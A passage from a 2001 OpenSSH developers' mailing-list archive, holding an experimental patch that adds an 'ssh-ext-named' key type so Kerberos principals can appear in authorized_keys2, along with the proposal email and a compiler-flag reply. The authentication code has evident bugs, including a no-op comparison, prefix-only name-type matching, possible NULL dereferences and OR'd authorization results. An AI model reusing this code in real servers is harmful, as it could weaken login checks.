compiling with -xarch=v9 in an attempt to gain the performance benifits of the UltraSPARC platfrom then this isn't what you are getting. In fact all it will do is hurt your performance since you will waste valuable cache space - bigger bits does NOT mean faster. -xarch=v9 means build a 64bit binary -xtarget=ultra will give you a 32bit binary optimized for UltraSPARC. I don't believe that this patch is neccessary. -- Darren J Moffat From Nicolas.Williams at ubsw.com Sat Jun 30 08:09:06 2001 From: Nicolas.Williams at ubsw.com (Nicolas Williams) Date: Fri, 29 Jun 2001 18:09:06 -0400 Subject: Adding 'name' key types In-Reply-To: <20010628165713.L9416@sm2p1386swk.wdr.com>; from willian on Thu, Jun 28, 2001 at 04:57:14PM -0400 References: <20010628165713.L9416@sm2p1386swk.wdr.com> Message-ID: <20010629180904.J6936@sm2p1386swk.wdr.com> Here's a patch to OpenSSH + GSS patches that implements the below. I can now put this in authorized_keys2 files: ssh-ext-named:krb5 !someuser at SOMEREALM It works well so far. Cheers, Nico Index: 2_9_p2_w_gss_and_krb5.4/key.h --- 2_9_p2_w_gss_and_krb5.4/key.h Tue, 26 Jun 2001 16:27:13 -0400 willian (OpenSSH/j/7_key.h 1.2 644) +++ 2_9_p2_w_gss_krb5_named_keys.1/key.h Fri, 29 Jun 2001 18:00:47 -0400 willian (OpenSSH/j/7_key.h 1.3 644) @@ -35,7 +35,8 @@ KEY_RSA, KEY_DSA, KEY_NULL, - KEY_UNSPEC + KEY_UNSPEC, + KEY_NAME }; enum fp_type { SSH_FP_SHA1, @@ -49,6 +50,9 @@ int type; RSA *rsa; DSA *dsa; + u_char *name; + u_int name_len; + char *name_type; }; Key *key_new(int type); Index: 2_9_p2_w_gss_and_krb5.4/key.c --- 2_9_p2_w_gss_and_krb5.4/key.c Tue, 26 Jun 2001 16:27:13 -0400 willian (OpenSSH/j/8_key.c 1.2 644) +++ 2_9_p2_w_gss_krb5_named_keys.1/key.c Fri, 29 Jun 2001 18:00:47 -0400 willian (OpenSSH/j/8_key.c 1.3 644) @@ -56,6 +56,8 @@ k->type = type; k->dsa = NULL; k->rsa = NULL; + k->name = NULL; + k->name_len = NULL; switch (k->type) { case KEY_RSA1: case KEY_RSA: @@ -72,6 +74,7 @@ dsa->pub_key = BN_new(); k->dsa = dsa; break; + case KEY_NAME: case KEY_UNSPEC: break; default: @@ -119,6 +122,11 @@ DSA_free(k->dsa); k->dsa = NULL; break; + case KEY_NAME: + if (k->name != NULL) + xfree(k->name); + k->name_len = 0; + break; case KEY_UNSPEC: break; default: @@ -130,8 +138,9 @@ int key_equal(Key *a, Key *b) { - if (a == NULL || b == NULL || a->type != b->type) + if (a == NULL || b == NULL || a->type != b->type) { return 0; + } switch (a->type) { case KEY_RSA1: case KEY_RSA: @@ -146,6 +155,17 @@ BN_cmp(a->dsa->g, b->dsa->g) == 0 && BN_cmp(a->dsa->pub_key, b->dsa->pub_key) == 0; break; + case KEY_NAME: + if ((a->name_type == NULL && b->name_type == NULL) || + (a->name_type == b->name_type)) + return (a->name_len == b->name_len) && + (memcmp(a->name, b->name, a->name_len) == 0); + if (a->name_type == NULL || b->name_type == NULL) + return 0; + if (strncmp(a->name_type, b->name_type, strlen(b->name_type)) == 0) + return (a->name_len == b->name_len) && + (memcmp(a->name, b->name, a->name_len) == 0); + break; default: fatal("key_equal: bad key type %d", a->type); break; @@ -160,7 +180,7 @@ EVP_MD_CTX ctx; u_char *blob = NULL; u_char *retval = NULL; - int len = 0; + u_int len = 0; int nlen, elen; *dgst_raw_length = 0; @@ -363,11 +383,12 @@ { Key *k; int success = -1; - char *cp, *space; + char *cp, *space, *name_type; int len, n, type; u_int bits; - u_char *blob; + u_char *blob = NULL; + name_type = NULL; cp = *cpp; switch(ret->type) { @@ -390,6 +411,7 @@ case KEY_UNSPEC: case KEY_RSA: case KEY_DSA: + case KEY_NAME: space = strchr(cp, ' '); if (space == NULL) { debug3("key_read: no space"); @@ -397,6 +419,17 @@ } *space = '\0'; type = key_type_from_name(cp); + if (type == KEY_NAME) { + char * colon = NULL; + + colon = strchr(cp, ':'); + + debug3("key_read: handling typed named key, %s, colon at %x", cp, colon); + if (colon != NULL && *(++colon) != '\0') { + name_type = xstrdup(colon); + } else + name_type == NULL; + } *space = ' '; if (type == KEY_UNSPEC) { debug3("key_read: no key found"); @@ -414,26 +447,60 @@ debug3("key_read: type mismatch"); return 0; } - len = 2*strlen(cp); - blob = xmalloc(len); - n = uudecode(cp, blob, len); - if (n < 0) { - error("key_read: uudecode %s failed", cp); - return -1; + if (ret->type == KEY_NAME && *cp == '!') { + cp++; + space = strchr(cp, '\n'); + if (space != NULL) + *space = '\0'; + debug3("key_read: reading named key %s", cp); + k = key_new(ret->type); + k->name = (unsigned char *) xstrdup(cp); + k->name_len = strlen(cp); + k->name_type = name_type; + *space = '\n'; + } else { + len = 2*strlen(cp); + blob = xmalloc(len); + n = uudecode(cp, blob, len); + if (n < 0) { + error("key_read: uudecode %s failed", cp); + return -1; + } + if (ret->type == KEY_NAME) { + debug3("key_read: reading uuencoded key %s", blob); + k = key_new(ret->type); + k->name = blob; + k->name_len = strlen(blob); + k->name_type = name_type; + } + else { + k = key_from_blob(blob, n); + } } - k = key_from_blob(blob, n); if (k == NULL) { error("key_read: key_from_blob %s failed", cp); return -1; } - xfree(blob); + if (blob != NULL) + xfree(blob); if (k->type != type) { error("key_read: type mismatch: encoding error"); key_free(k); return -1; } /*XXXX*/ - if (ret->type == KEY_RSA) { + if (ret->type == KEY_NAME) { + /* + if (ret->name != NULL) + xfree(ret->name); + */ + ret->name = k->name; + ret->name_len = k->name_len; + ret->name_type = k->name_type; + k->name = NULL; + k->name_len = 0; + success = 1; + } else if (ret->type == KEY_RSA) { if (ret->rsa != NULL) RSA_free(ret->rsa); ret->rsa = k->rsa; @@ -487,7 +554,7 @@ } } else if ((key->type == KEY_DSA && key->dsa != NULL) || (key->type == KEY_RSA && key->rsa != NULL)) { - int len, n; + u_int len, n; u_char *blob, *uu; key_to_blob(key, &blob, &len); uu = xmalloc(2*len); @@ -498,6 +565,19 @@ } xfree(blob); xfree(uu); + } else if (key->type == KEY_NAME && key->name != NULL && + key->name_len) { + int n; + u_char *blob, *uu; + uu = xmalloc(2*(key->name_len)); + blob = xstrdup(key->name); + n = uuencode(blob, key->name_len, uu, key->name_len); + if (n > 0) { + fprintf(f, "%s %s", key_ssh_name(key), uu); + success = 1; + } + xfree(blob); + xfree(uu); } return success; } @@ -514,6 +594,9 @@ case KEY_DSA: return "DSA"; break; + case KEY_NAME: + return "Named"; + break; } return "unknown"; } @@ -527,6 +610,9 @@ case KEY_DSA: return "ssh-dss"; break; + case KEY_NAME: + return "ssh-ext-named"; + break; } return "ssh-unknown"; } @@ -604,6 +690,11 @@ BN_copy(n->rsa->n, k->rsa->n); BN_copy(n->rsa->e, k->rsa->e); break; + case KEY_NAME: + n->name_len = k->name_len; + n->name = xmalloc(k->name_len); + memcpy(n->name, k->name, n->name_len); + break; default: fatal("key_from_private: unknown type %d", k->type); break; @@ -624,6 +715,11 @@ return KEY_RSA; } else if (strcmp(name, "ssh-dss") == 0){ return KEY_DSA; + } else if (strcmp(name, "ssh-ext-named") == 0){ + return KEY_NAME; + } else if (strncmp(name, "ssh-ext-named:", strlen("ssh-ext-named:")) == 0){ + debug3("key_type_from_name: got a typed named key type: %s", name); + return KEY_NAME; } else if (strcmp(name, "null") == 0){ return KEY_NULL; } Index: 2_9_p2_w_gss_and_krb5.4/gss-serv.c --- 2_9_p2_w_gss_and_krb5.4/gss-serv.c Tue, 26 Jun 2001 16:27:13 -0400 willian (OpenSSH/l/25_gss-serv.c 1.1 644) +++ 2_9_p2_w_gss_krb5_named_keys.1/gss-serv.c Fri, 29 Jun 2001 18:00:47 -0400 willian (OpenSSH/l/25_gss-serv.c 1.2 644) @@ -124,27 +124,41 @@ * Returns true if the user is OK to log in, otherwise returns 0 */ +static char name_type_name[5] = "krb5"; + int ssh_gssapi_krb5_userok(char *name) { krb5_principal princ; - int retval; + int retval, retval2; + Key k; if (ssh_gssapi_krb5_init() == 0) return 0; + k.type = KEY_NAME; + k.name = gssapi_client_name.value; + k.name_len = strlen(gssapi_client_name.value); + k.name_type = name_type_name; + + debug3("ssh_gssapi_krb5_userok:"); + debug3("ssh_gssapi_krb5_userok: %s", k.name_type); + if ((retval=krb5_parse_name(krb_context, gssapi_client_name.value, &princ))) { log("krb5_parse_name(): %.100s", krb5_get_err_text(krb_context,retval)); return 0; } + + retval2 = user_key_allowed(getpwnam(name), &k); + if (krb5_kuserok(krb_context, princ, name)) retval = 1; else retval = 0; krb5_free_principal(krb_context, princ); - return retval; + return retval | retval2; } /* Make sure that this is called _after_ we've setuid to the user */ On Thu, Jun 28, 2001 at 04:57:14PM -0400, Nicolas Williams wrote: > > Playing around with the [wonderful] GSS-API patches for OpenSSH [1] I > noticed that there is a bit of functionality missing from > OpenSSH/GSS-API, namely that authorized_keys2 has no meaning when using > GSS authentication. > > Yes, ~/.k5login can be used to grant access to an account for > applications that support Kerberos, as does OpenSSH with those GSS > patches, but .k5login does not and cannot provide the > from/command/environment and other useful options that SSH's > authorized_keys2 file entries can. > > So, after looking around, especially in key.h and key.c and auth2.c, it > occurred to me that a new key type could be added for dealing with named > keys, that is, names which can be authenticated (e.g., certificate > names, Kerberos principal names). > > The neat thing is that auth2.c:user_key_allowed() is key-type > independent (so arguably it doesn't belong in auth2.c), and thus could > be called from ssh_gssapi_userok() [instead of, or in addition to the > GSS mechanism specific *userok() methods]. > > The only questions, in my mind, are > > - how to format key names for use in authorized_keys2? > > I propose starting the key blob with 'name:' followed by a possibly > null mechanism name, another ':' and the key name in question > (uuencoded so whitespace, non-ascii characters and so on can be > unambiguously present in key names). > > - how to deal with generic names vs. mechanism specific names? > > I.e., should an 'exported' GSS name be checked as a 'gss' key name > type? Or should it be checked against a name type specific to the > mechanism used to authenticate the client? > > I think this should probably be optional behaviour. > > > [1] http://www.sxw.org.uk/computing/patches/ > > > Thoughts? Flames? > > Nico > -- > > . -- . Visit our website at http://www.ubswarburg.com This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. E-mail transmission cannot be guaranteed to be secure or error-free as information could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or contain viruses. The sender therefore does not accept liability for any errors or omissions in the contents of this message which arise as a result of e-mail transmission. If verification is required please request a hard-copy version. This message is provided for informational purposes and should not be construed as a solicitation or offer to buy or sell any securities or related financial instruments.